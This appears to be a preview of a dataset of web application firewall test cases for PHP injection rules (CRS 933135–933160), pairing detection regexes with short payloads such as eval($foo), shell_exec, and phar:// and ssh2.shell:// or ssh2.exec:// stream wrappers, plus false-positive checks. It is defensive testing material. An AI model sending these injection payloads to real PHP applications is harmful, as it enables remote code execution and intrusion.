{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "\\$\\s*\\{\\s*\\S[^\\{\\}]*\\}", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, { ...
{ "rule_id": "933135", "test_description": "$ { CONSTANT }" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=%24%7B%7D" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "\\$\\s*\\{\\s*\\S[^\\{\\}]*\\}", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, { ...
{ "rule_id": "933135", "test_description": "${}" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=%24%20%7B%20%7D" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "\\$\\s*\\{\\s*\\S[^\\{\\}]*\\}", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, { ...
{ "rule_id": "933135", "test_description": "$ { }" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=%24%7Ba%7D" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "\\$\\s*\\{\\s*\\S[^\\{\\}]*\\}", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, { ...
{ "rule_id": "933135", "test_description": "${a}" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "var=php://stdout" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?i)php://(?:std(?:in|out|err)|(?:in|out)put|fd|memory|temp|filter)", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, ...
{ "rule_id": "933140", "test_description": "PHP Injection Attack: I/O Stream" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "file=phar://phpinfo.zip/phpinfo.txt" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?:bzip2|expect|glob|ogg|(?:ph|r)ar|ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?|z(?:ip|lib))://", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES", ...
{ "rule_id": "933200", "test_description": "Positive test: PHP Injection Attack - Wrapper scheme detected (phar://)" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "file=compress.bzip2://file.bz2" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?:bzip2|expect|glob|ogg|(?:ph|r)ar|ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?|z(?:ip|lib))://", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES", ...
{ "rule_id": "933200", "test_description": "Positive test: PHP Injection Attack - Wrapper scheme detected (compress.bzip2://)" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "file=compress.zlib://http://www.example.com/some_file.gz" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?:bzip2|expect|glob|ogg|(?:ph|r)ar|ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?|z(?:ip|lib))://", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES", ...
{ "rule_id": "933200", "test_description": "Positive test: PHP Injection Attack - Wrapper scheme detected (compress.zlib://)" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "file=zip://archive.zip" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?:bzip2|expect|glob|ogg|(?:ph|r)ar|ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?|z(?:ip|lib))://", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES", ...
{ "rule_id": "933200", "test_description": "Positive test: PHP Injection Attack - Wrapper scheme detected (zip://)" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "file=lz77://some_file.lz" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?:bzip2|expect|glob|ogg|(?:ph|r)ar|ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?|z(?:ip|lib))://", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES", ...
{ "rule_id": "933200", "test_description": "Negative test: PHP Injection Attack - Non-existent wrapper scheme (lz77://)" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "file=ssh2.shell://user:password@example.com:22/xterm" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?:bzip2|expect|glob|ogg|(?:ph|r)ar|ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?|z(?:ip|lib))://", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES", ...
{ "rule_id": "933200", "test_description": "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.shell://)" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "file=ssh2.exec://user:password@example.com:22/usr/local/bin/kubectl" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?:bzip2|expect|glob|ogg|(?:ph|r)ar|ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?|z(?:ip|lib))://", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES", ...
{ "rule_id": "933200", "test_description": "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.exec://)" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "file=ssh2.tunnel://user:password@example.com:22/10.0.0.1:25" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?:bzip2|expect|glob|ogg|(?:ph|r)ar|ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?|z(?:ip|lib))://", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES", ...
{ "rule_id": "933200", "test_description": "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.tunnel://)" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "file=ssh2.sftp://user:password@example.com:22/path/to/filename" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?:bzip2|expect|glob|ogg|(?:ph|r)ar|ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?|z(?:ip|lib))://", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES", ...
{ "rule_id": "933200", "test_description": "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.sftp://)" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "file=ssh2.scp://user:password@example.com:22/path/to/filename" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?:bzip2|expect|glob|ogg|(?:ph|r)ar|ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?|z(?:ip|lib))://", "negated": false, "type": "@rx" }, "variables": [ { "name": "REQUEST_COOKIES", ...
{ "rule_id": "933200", "test_description": "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.scp://)" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "base64_deCOde" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "base64_decode mixed case" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=bzdecomprEss" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "bzdecompress" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=FOOcall_user_func" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "call_user_func" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=FOOfsockopen" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "fsockopen" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=FOOgzdecode" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "gzdecode" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=FOOGzInFlAtE" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "GzInFlAtE" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=FOOpHpInFo" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "pHpInFo mixed case" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "I%20don%27t%20like%20gzuncompress" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "gzuncompress" }
{ "attack_context": { "location": [ "uri_params" ], "method": null }, "malicious_payload": [ { "location": "uri_params", "value": "bar=pfsockopen%28%27foo%27%2C%2025%29" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "fsockopen" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "bar=posix_getpwuiD%28%27foo%27%2C%2025%29" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "posix_getpwuiD" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "Shell%5fexec=bla" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "shell_exec" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "ZlIb%5fDeCoDe=bla" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "ZlIb_DeCoDe" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "foo=get_defined_functions%28%29%5B0%5D" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "get_defined_functions" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "foo=get_defined_vars%28%29%5B0%5D" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "get_defined_vars" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "foo=curl_iNit%28%29" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "PHP function call in body, mixed case.\npayload: curl_iNit()\n" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "posix_getegid%28%29" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "PHP function call in body\npayload: posix_getegid()\n" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "x=Print_r%28%20%29" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "PHP function call in body, mixed case\npayload: Print_r()\n" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "x=strrev%28%20%29" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "PHP function call in body.\npayload: strrev()\n" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=the%20files%20%28yep%29" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "False Positive test\npayload: the files (yep)\n" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=exec%20%28" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "False Positive test, exec should be followed by parenthesis\npayload: exec (\n" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=executor%28%29" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "False Positive test\npayload: executor()\n" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=cheval%28%24foo%29" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "False Positive test\npayload: cheval($foo)\n" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=audi%6ffile%28%24foo%29" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "False Positive test\npayload: audiofile($foo)\n" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=the%20system%20is%20down%28%29" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "False Positive test\npayload: the system is down()\n" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=ecosystem%28%29" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "False Positive test\npayload: ecosystem()\n" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=systems%28%29" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "False Positive test, function doesn't exist\npayload: systems()\n" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=system%20something%28%29" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "False Positive test, function doesn't exist\npayload: system something()\n" }
{ "attack_context": { "location": [ "uri_params" ], "method": "POST" }, "malicious_payload": [ { "location": "uri_params", "value": "a=preview" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "Snippets of English words (like `prev`) should not be matched, requiring regex match with word boundaries (e.g. 933160)" }
{ "attack_context": { "location": [ "uri_params" ], "method": "POST" }, "malicious_payload": [ { "location": "uri_params", "value": "a=exploration" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "Snippets of English words (like `exp`) should not be matched, requiring regex match with word boundaries (e.g. 933160)" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=file_ExistS%20%28%0A%0A%29" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "PHP mixed case function call with space, LF between ().\npayload: file_ExistS (\\n\\n)\n" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=RootAndLeafOpenCamera.jpg" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "False positive with filename matching `fopen`\n" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=autodescription-site-settings[title_strip_tags]" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "SEO Framework false positive\nmatching 'strip_tags' in 'title_strip_tags'\n" }
{ "attack_context": { "location": [ "uri_params" ], "method": "POST" }, "malicious_payload": [ { "location": "uri_params", "value": "test=SprintForTheCause" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "False positive with SprintForTheCause matching printf" }
{ "attack_context": { "location": [ "uri_params" ], "method": "POST" }, "malicious_payload": [ { "location": "uri_params", "value": "test=printf(foo)" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "php-function-names-933150.data", "negated": false, "type": "@pmFromFile" }, "variables": [ { "name": "REQUEST_COOKIES", "negated": false, "part": "" }, ...
{ "rule_id": "933150", "test_description": "Don't block printf function (Handled by 933160)" }
{ "attack_context": { "location": [ "uri_params" ], "method": "GET" }, "malicious_payload": [ { "location": "uri_params", "value": "foo=chr%28123%29" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?i)\\b\\(?[\\\"']*(?:assert(?:_options)?|c(?:hr|reate_function)|e(?:val|x(?:ec|p))|f(?:ile(?:group)?|open|puts)|glob|i(?:mage(?:gif|(?:jpe|pn)g|wbmp|xbm)|s_a)|m(?:d5|kdir)|o(?:pendir|rd)|p(?:assthru|open|r(?:intf...
{ "rule_id": "933160", "test_description": "PHP function call in query.\npayload: chr(123)\n" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "eval($foo)" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?i)\\b\\(?[\\\"']*(?:assert(?:_options)?|c(?:hr|reate_function)|e(?:val|x(?:ec|p))|f(?:ile(?:group)?|open|puts)|glob|i(?:mage(?:gif|(?:jpe|pn)g|wbmp|xbm)|s_a)|m(?:d5|kdir)|o(?:pendir|rd)|p(?:assthru|open|r(?:intf...
{ "rule_id": "933160", "test_description": "PHP function call with variable as parameter.\npayload: eval($foo)\n" }
{ "attack_context": { "location": [ "post_body" ], "method": "POST" }, "malicious_payload": [ { "location": "post_body", "value": "eval%0D%28%24foo%29" } ] }
{ "attack_type": [ "attack-injection-php" ], "detection": { "operator": { "argument": "(?i)\\b\\(?[\\\"']*(?:assert(?:_options)?|c(?:hr|reate_function)|e(?:val|x(?:ec|p))|f(?:ile(?:group)?|open|puts)|glob|i(?:mage(?:gif|(?:jpe|pn)g|wbmp|xbm)|s_a)|m(?:d5|kdir)|o(?:pendir|rd)|p(?:assthru|open|r(?:intf...
{ "rule_id": "933160", "test_description": "PHP function call, CR, ($variable).\npayload: eval\\r($foo)\n" }
End of preview.

No dataset card yet

Downloads last month
5